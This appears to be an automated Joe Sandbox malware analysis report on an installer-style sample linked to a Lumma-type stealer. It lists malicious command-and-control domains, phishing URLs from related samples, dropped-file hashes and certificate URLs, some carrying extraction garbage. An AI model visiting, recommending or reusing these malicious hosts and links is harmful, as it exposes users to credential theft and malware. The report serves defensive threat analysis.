http://subca.ocsp-certum.com02	0%	URL Reputation	safe
http://subca.ocsp-certum.com01	0%	URL Reputation	safe
https://www.innosetup.com/	0%	URL Reputation	safe
http://crl.certum.pl/ctnca2.crl0l	0%	URL Reputation	safe
http://repository.certum.pl/ctnca2.cer09	0%	URL Reputation	safe
http://crl.entrust.net/ts1ca.crl0	0%	URL Reputation	safe
http://www.certum.pl/CPS0	0%	URL Reputation	safe
http://repository.certum.pl/ctnca.cer09	0%	URL Reputation	safe
http://crl.certum.pl/ctnca.crl0k	0%	URL Reputation	safe
http://www.entrust.net/rpa03	0%	URL Reputation	safe
http://aia.entrust.net/ts1-chain256.cer01	0%	URL Reputation	safe
https://www.certum.pl/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://www.entrust.net/rpa0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown
authorisev.site	104.21.85.194	true	true	unknown

Contacted URLs

Name	Malicious	Reputation
contemteny.site	true	unknown
opposezmny.site	true	unknown
servicedny.site	true	unknown
goalyfeastz.site	true	unknown
authorisev.site	true	unknown
faulteyotk.site	true	unknown
https://authorisev.site/api	true	unknown
seallysl.site	true	unknown
dilemmadu.site	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	file.exe	false		unknown
http://repository.certum.pl/ctsca2021.cer0A	file.exe	false		unknown
http://vovsoft.com/blog/how-to-activate-using-license-key/openU	file.exe	false		unknown
http://crl.certum.pl/ctsca2021.crl0o	file.exe	false		unknown
http://repository.certum.pl/cscasha2.cer0	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false		unknown
https://authorisev.site/2U	MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.sectigo.com0	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false	URL Reputation: safe	unknown
http://ocsp.entrust.net03	file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	false	URL Reputation: safe	unknown
http://ocsp.entrust.net02	file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	false	URL Reputation: safe	unknown
https://authorisev.site:443/api	MSBuild.exe, 00000024.00000002.2348303261.000000000124D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://cscasha2.ocsp-ce	file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://ccsca2021.crl.certum.pl/ccsca2021.crl0s	file.exe	false		unknown
http://www.indyproject.org/	file.exe	false	URL Reputation: safe	unknown
https://www.autoitscript.com/autoit3/	is-7LJOT.tmp.3.dr	false		unknown
http://repository.certum.pl/ccsca2021.cer0	file.exe	false		unknown
http://vovsoft.com/	file.exe	false		unknown
http://subca.ocsp-certum.com05	file.exe	false		unknown
https://www.remobjects.com/ps	file.exe, 00000000.00000003.1677553862.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676905528.0000000003260000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1678965208.0000000000E91000.00000020.00000001.01000000.00000004.sdmp, file.tmp, 00000003.00000000.1685727842.000000000029D000.00000020.00000001.01000000.00000009.sdmp, file.tmp.0.dr, file.tmp.2.dr	false	URL Reputation: safe	unknown
http://subca.ocsp-certum.com02	file.exe	false	URL Reputation: safe	unknown
http://subca.ocsp-certum.com01	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false	URL Reputation: safe	unknown
https://www.innosetup.com/	file.exe, 00000000.00000003.1677553862.000000007F86B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1676905528.0000000003260000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.1678965208.0000000000E91000.00000020.00000001.01000000.00000004.sdmp, file.tmp, 00000003.00000000.1685727842.000000000029D000.00000020.00000001.01000000.00000009.sdmp, file.tmp.0.dr, file.tmp.2.dr	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0D	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false		unknown
http://crl.certum.pl/ctnca2.crl0l	file.exe	false	URL Reputation: safe	unknown
http://repository.certum.pl/ctnca2.cer09	file.exe	false	URL Reputation: safe	unknown
https://jrsoftware.org0	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false		unknown
https://jrsoftware.org/	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false		unknown
http://ccsca2021.ocsp-certum.com05	file.exe	false		unknown
http://crl.entrust.net/ts1ca.crl0	file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	false	URL Reputation: safe	unknown
http://www.certum.pl/CPS0	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false	URL Reputation: safe	unknown
http://repository.certum.pl/ctnca.cer09	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false	URL Reputation: safe	unknown
http://vovsoft.com	file.exe	false		unknown
http://crl.certum.pl/ctnca.crl0k	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false	URL Reputation: safe	unknown
http://www.entrust.net/rpa03	file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	false	URL Reputation: safe	unknown
https://vovsoft.com/translation/	file.exe	false		unknown
http://aia.entrust.net/ts1-chain256.cer01	file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/X	Updater.exe, 0000001C.00000000.1715511029.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmp, Updater.exe, 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmp, is-7LJOT.tmp.3.dr	false		unknown
http://vovsoft.com/help/	file.exe	false		unknown
http://vovsoft.comopenU	file.exe	false		unknown
https://www.certum.pl/CPS0	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, file.exe, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false	URL Reputation: safe	unknown
http://vovsoft.comopenS	file.exe	false		unknown
http://crl.certum.pl/cscasha2.crl0q	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false		unknown
http://cscasha2.ocsp-certum.com04	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false		unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false	URL Reputation: safe	unknown
https://vovsoft.com/blog/credits-and-acknowledgements/open	file.exe	false		unknown
https://authorisev.site//	MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://authorisev.site/0	MSBuild.exe, 00000024.00000002.2348303261.00000000012DE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://authorisev.site/mOW	MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://vovsoft.com/blog/how-to-uninstall-vovsoft-software/openU	file.exe	false		unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	file.tmp, 00000001.00000003.1680291357.0000000003B70000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.1.dr, _isdecmp.dll.3.dr	false	URL Reputation: safe	unknown
https://authorisev.site/	MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://vovsoft.com/translation/openU	file.exe	false		unknown
http://repository.certum	file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://ocsp.us	file.tmp, 00000001.00000003.1682791691.0000000002B80000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000003.00000003.1716658653.0000000002490000.00000004.00001000.00020000.00000000.sdmp	false		unknown
http://crl.entrust.net/2048ca.crl0	file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	false	URL Reputation: safe	unknown
https://authorisev.site/pi	MSBuild.exe, 00000024.00000002.2348303261.0000000001271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000024.00000002.2348303261.00000000012F2000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.entrust.net/rpa0	file.exe, is-EUGF2.tmp.3.dr, is-5MQFH.tmp.3.dr, is-E0D1D.tmp.3.dr	false	URL Reputation: safe	unknown
http://vovsoft.com/openU	file.exe	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.85.194	authorisev.site	United States		13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546641
Start date and time:	2024-11-01 10:49:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	37
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@60/28@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 69 Number of non-executed functions: 252
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 2.19.126.163, 2.19.126.137, 13.85.23.206, 192.229.221.95, 40.69.42.241
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, ocsp.edge.digicert.com, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
05:50:01	API Interceptor	1x Sleep call for process: file.tmp modified
05:50:55	API Interceptor	7x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.85.194	Ezym4jPEel.exe	Get hash	malicious	FormBook	Browse	www.butload.info/hsd/?jFNTe=aFNTVpDp&0VMtBJ=0M6dG0N9iKPyripSyBO136ZS5aZuLlRaoIGjNAifnY9kRyWL+ieupSXi1kcdAtSv7XLJ2UqcdA==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	https://www.attemplate.com/eur/f93d2770-ba65-484a-a0ba-ef8bddcf2ed4/3cd045c9-e63b-453b-b9a3-b5e29e9ef20e/9253d536-e8da-44d0-b681-445519f254ea/login?id=M29uR0UzZG8zVmNGSk5ZaFZXMjhZajJpczk4c0o3VGlNTW9rTk56elpFQzBLcWlLdEhEaCtPQWtlb1FXZTQxMDdIK21wNzNBNHlUWGtpQzhmaTRXdGVYcWlPaUF6VGpQUW1pTUh3VHVDWUI1RWUzVjcyWVdjZ0s5M3FOc2hGenRka0xZTGdmdjRJcVltMytlMTdMSEpzT3RTRjVKb2tibVB3M01RZnppUUwwYkkxOXh0VFBER01OeTRIZldNL0ZzOFg3NWJQMWlBMWY1aU9keUVBclJsS0F1WlBXY0JVQmNIdmlub1FOaGxYRHhXL3RaTFZzWE5JS2JxaVdVYklXWUh2SXk0aGJnK1Q2R3FvbTIwQmdWWHBnUU9PSmdjdlRxYmh6bTRRZ0V4TEN2d2JpWWU0Y1drVkZXd1VqK2MvQTdtZ21Hbk5hcGgrdFo3cC9RcDlma1RZRm1EUmJ3Y2tnaEc4R1FRRmsxSHNBY1RjWURCYU81cXhQSW5FQklQbTVha1RLSFBtNjlmOTlEMnIrdTYzbFJncVZMZWM1ZWVoZFZ6eFo4KzBpQW5MWT0	Get hash	malicious	HTMLPhisher, Microsoft Phishing	Browse	13.107.246.45
	https://url.avanan.click/v2/r01/___https://h2o.ci.akron.oh.us/iwr/user/login.seam___.YXAzOmluZmluaXRlc29sdXRpb25zbGxjLXByZXN0aWdlYWRtaW5zZXJ2aWNlczphOm86NzUyOWFlMTE5NjU3Njc3NTJlNTQyYWQxM2Y1ZTcwZDY6NzpjNWQyOjZkZDczZDkyM2VjNmVjZTM5NDA0OGU4ZGYyYzUzMTAzMTJhMGFiYzg3NmE2NGIwMWVmMjk1MzI0NGExMWQyNjQ6cDpUOk4	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://my-homepagero.sa.com/exml/	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	https://pdfhost.io/v/maTYQa.jg_mqfilserawxgxdgxhhgsx_1	Get hash	malicious	Unknown	Browse	13.107.246.45
	1nnlXctdko.dll	Get hash	malicious	Amadey	Browse	13.107.246.45
	https://hotmail.pizza4you.com.br/	Get hash	malicious	Mamba2FA	Browse	13.107.246.45
	https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.com	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	19972041693118971.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	qbE2mhhzCq.exe	Get hash	malicious	Blank Grabber	Browse	13.107.246.45
	https://www.miroslavska.com/pvt/language-prefs?return_url=https:///alrbanyon.com/..&lng=en&return_url=/plain-flange_red.thick./dn-800/glatter-flansch-dn-800:813x20-pn-10-id-8195-mm	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
fp2e7a.wpc.phicdn.net	https://www.attemplate.com/eur/f93d2770-ba65-484a-a0ba-ef8bddcf2ed4/3cd045c9-e63b-453b-b9a3-b5e29e9ef20e/9253d536-e8da-44d0-b681-445519f254ea/login?id=M29uR0UzZG8zVmNGSk5ZaFZXMjhZajJpczk4c0o3VGlNTW9rTk56elpFQzBLcWlLdEhEaCtPQWtlb1FXZTQxMDdIK21wNzNBNHlUWGtpQzhmaTRXdGVYcWlPaUF6VGpQUW1pTUh3VHVDWUI1RWUzVjcyWVdjZ0s5M3FOc2hGenRka0xZTGdmdjRJcVltMytlMTdMSEpzT3RTRjVKb2tibVB3M01RZnppUUwwYkkxOXh0VFBER01OeTRIZldNL0ZzOFg3NWJQMWlBMWY1aU9keUVBclJsS0F1WlBXY0JVQmNIdmlub1FOaGxYRHhXL3RaTFZzWE5JS2JxaVdVYklXWUh2SXk0aGJnK1Q2R3FvbTIwQmdWWHBnUU9PSmdjdlRxYmh6bTRRZ0V4TEN2d2JpWWU0Y1drVkZXd1VqK2MvQTdtZ21Hbk5hcGgrdFo3cC9RcDlma1RZRm1EUmJ3Y2tnaEc4R1FRRmsxSHNBY1RjWURCYU81cXhQSW5FQklQbTVha1RLSFBtNjlmOTlEMnIrdTYzbFJncVZMZWM1ZWVoZFZ6eFo4KzBpQW5MWT0	Get hash	malicious	HTMLPhisher, Microsoft Phishing	Browse	192.229.221.95
	https://url.avanan.click/v2/r01/___https://h2o.ci.akron.oh.us/iwr/user/login.seam___.YXAzOmluZmluaXRlc29sdXRpb25zbGxjLXByZXN0aWdlYWRtaW5zZXJ2aWNlczphOm86NzUyOWFlMTE5NjU3Njc3NTJlNTQyYWQxM2Y1ZTcwZDY6NzpjNWQyOjZkZDczZDkyM2VjNmVjZTM5NDA0OGU4ZGYyYzUzMTAzMTJhMGFiYzg3NmE2NGIwMWVmMjk1MzI0NGExMWQyNjQ6cDpUOk4	Get hash	malicious	Unknown	Browse	192.229.221.95
	917155452380320858.js	Get hash	malicious	Strela Downloader	Browse	192.229.221.95
	https://delview.com/MobileDefault.aspx?reff=https%3A%2F%2Fstrasburgva.jimdosite.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://my-homepagero.sa.com/exml/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	https://pdfhost.io/v/maTYQa.jg_mqfilserawxgxdgxhhgsx_1	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://www.seucabelosemqueda.site/?&c=E,1,cRdm44xNAFnvsoEikdzjtf1PPAgWS9tpg0ubia7cbwt-mqWhjuhCoorsSmSpyTQbRbnEmxeGM9L3H3Ke74kewMAbyflnbdCxo3idr-f46A9rR7Cf2zlqsmVUjw,,&typo=1	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://bafybeiddvo3il63heagouckt2pt3cr4xxiogr3tuansgqgmot65ahjsfma.ipfs.dweb.link/#sean@virtualintelligencebriefing.com	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	stealer.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://0nmdby.data--8.co.uk/oGRApYgs	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	kill.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	http://edgeupgrade.com	Get hash	malicious	Unknown	Browse	104.22.48.74
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	https://pcapp.store/pixel.gif	Get hash	malicious	Unknown	Browse	172.67.15.14
	draft contract for order #782334.exe	Get hash	malicious	FormBook	Browse	172.67.131.32
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	188.114.96.3
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	188.114.97.3
	V323904LY3.lNK.lnk	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://send-space.s3.eu-north-1.amazonaws.com/de.html	Get hash	malicious	Unknown	Browse	104.22.75.171
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	file.exe	Get hash	malicious	Stealc	Browse	13.107.246.45
	https://tx.gl/r/jQ2FU/	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.attemplate.com/eur/f93d2770-ba65-484a-a0ba-ef8bddcf2ed4/3cd045c9-e63b-453b-b9a3-b5e29e9ef20e/9253d536-e8da-44d0-b681-445519f254ea/login?id=M29uR0UzZG8zVmNGSk5ZaFZXMjhZajJpczk4c0o3VGlNTW9rTk56elpFQzBLcWlLdEhEaCtPQWtlb1FXZTQxMDdIK21wNzNBNHlUWGtpQzhmaTRXdGVYcWlPaUF6VGpQUW1pTUh3VHVDWUI1RWUzVjcyWVdjZ0s5M3FOc2hGenRka0xZTGdmdjRJcVltMytlMTdMSEpzT3RTRjVKb2tibVB3M01RZnppUUwwYkkxOXh0VFBER01OeTRIZldNL0ZzOFg3NWJQMWlBMWY1aU9keUVBclJsS0F1WlBXY0JVQmNIdmlub1FOaGxYRHhXL3RaTFZzWE5JS2JxaVdVYklXWUh2SXk0aGJnK1Q2R3FvbTIwQmdWWHBnUU9PSmdjdlRxYmh6bTRRZ0V4TEN2d2JpWWU0Y1drVkZXd1VqK2MvQTdtZ21Hbk5hcGgrdFo3cC9RcDlma1RZRm1EUmJ3Y2tnaEc4R1FRRmsxSHNBY1RjWURCYU81cXhQSW5FQklQbTVha1RLSFBtNjlmOTlEMnIrdTYzbFJncVZMZWM1ZWVoZFZ6eFo4KzBpQW5MWT0	Get hash	malicious	HTMLPhisher, Microsoft Phishing	Browse	13.107.246.45
	https://send-space.s3.eu-north-1.amazonaws.com/de.html	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.246.45
	https://url.avanan.click/v2/r01/___https://h2o.ci.akron.oh.us/iwr/user/login.seam___.YXAzOmluZmluaXRlc29sdXRpb25zbGxjLXByZXN0aWdlYWRtaW5zZXJ2aWNlczphOm86NzUyOWFlMTE5NjU3Njc3NTJlNTQyYWQxM2Y1ZTcwZDY6NzpjNWQyOjZkZDczZDkyM2VjNmVjZTM5NDA0OGU4ZGYyYzUzMTAzMTJhMGFiYzg3NmE2NGIwMWVmMjk1MzI0NGExMWQyNjQ6cDpUOk4	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://delview.com/MobileDefault.aspx?reff=https%3A%2F%2Fstrasburgva.jimdosite.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	ICBM.exe	Get hash	malicious	Xmrig	Browse	13.107.246.45
	ICBM.exe	Get hash	malicious	Xmrig	Browse	13.107.246.45
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.246.45
a0e9f5d64349fb13191bc781f81f42e1	SecuriteInfo.com.Trojan.PWS.Lumma.775.32093.2339.exe	Get hash	malicious	LummaC	Browse	104.21.85.194
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.85.194
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.85.194
	E_dekont.cmd	Get hash	malicious	DBatLoader, Nitol, PureLog Stealer, XWorm	Browse	104.21.85.194
	file.exe	Get hash	malicious	LummaC	Browse	104.21.85.194
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.85.194
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.85.194
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.85.194
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.85.194
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	104.21.85.194

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_setup64.tmp	WIN_SCM_RDM_INSTALL_4.0.4.0.EXE	Get hash	malicious	Unknown	Browse
	WIN_SCM_RDM_INSTALL_4.0.4.0.EXE	Get hash	malicious	Unknown	Browse
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	Advanced_IP_Scanner_2.5.4594.12.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	Setup_DigiSignerOne_x86.exe	Get hash	malicious	Havoc	Browse
	XS_Trade_AI-newest_release_.exe	Get hash	malicious	LummaC	Browse
	Reminder.exe	Get hash	malicious	Amadey	Browse
	Reminder.exe	Get hash	malicious	Amadey	Browse
	Reminder.exe	Get hash	malicious	Amadey	Browse
C:\Users\user\AppData\Local\Temp\is-NDTIL.tmp\_isetup\_isdecmp.dll	Reminder.exe	Get hash	malicious	Amadey	Browse
	Reminder.exe	Get hash	malicious	Amadey	Browse
	Reminder.exe	Get hash	malicious	Amadey	Browse
	MDE_File_Sample_7046d0b264f80a016ec10158377c7e76c395cffb.zip	Get hash	malicious	Xmrig	Browse
	Reminder.exe	Get hash	malicious	Amadey	Browse
	Reminder.exe	Get hash	malicious	Amadey	Browse
	AX3-GUI-45.exe	Get hash	malicious	Unknown	Browse
	Defender_Update_Setup_778795.exe	Get hash	malicious	Unknown	Browse
	AX3-GUI-45.exe	Get hash	malicious	Unknown	Browse
	Windows7_Activator.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\bYrIyAT.a3x

Download File

Process:	C:\Users\user\AppData\Local\hangbird\Updater.exe
File Type:	data
Category:	dropped
Size (bytes):	510574
Entropy (8bit):	6.622727339019667
Encrypted:	false
SSDEEP:	12288:q40MCF2RHzA4JoHwatPBVd1LCoD1aE/and8as/CmbO:30MCFmyQoJVjNaYa/mbO
MD5:	BD2302F160B9895DD7BCF9C7DFA9BEA7
SHA1:	8FCB264280A30CC5F959D54AE75AE394054CA5A0
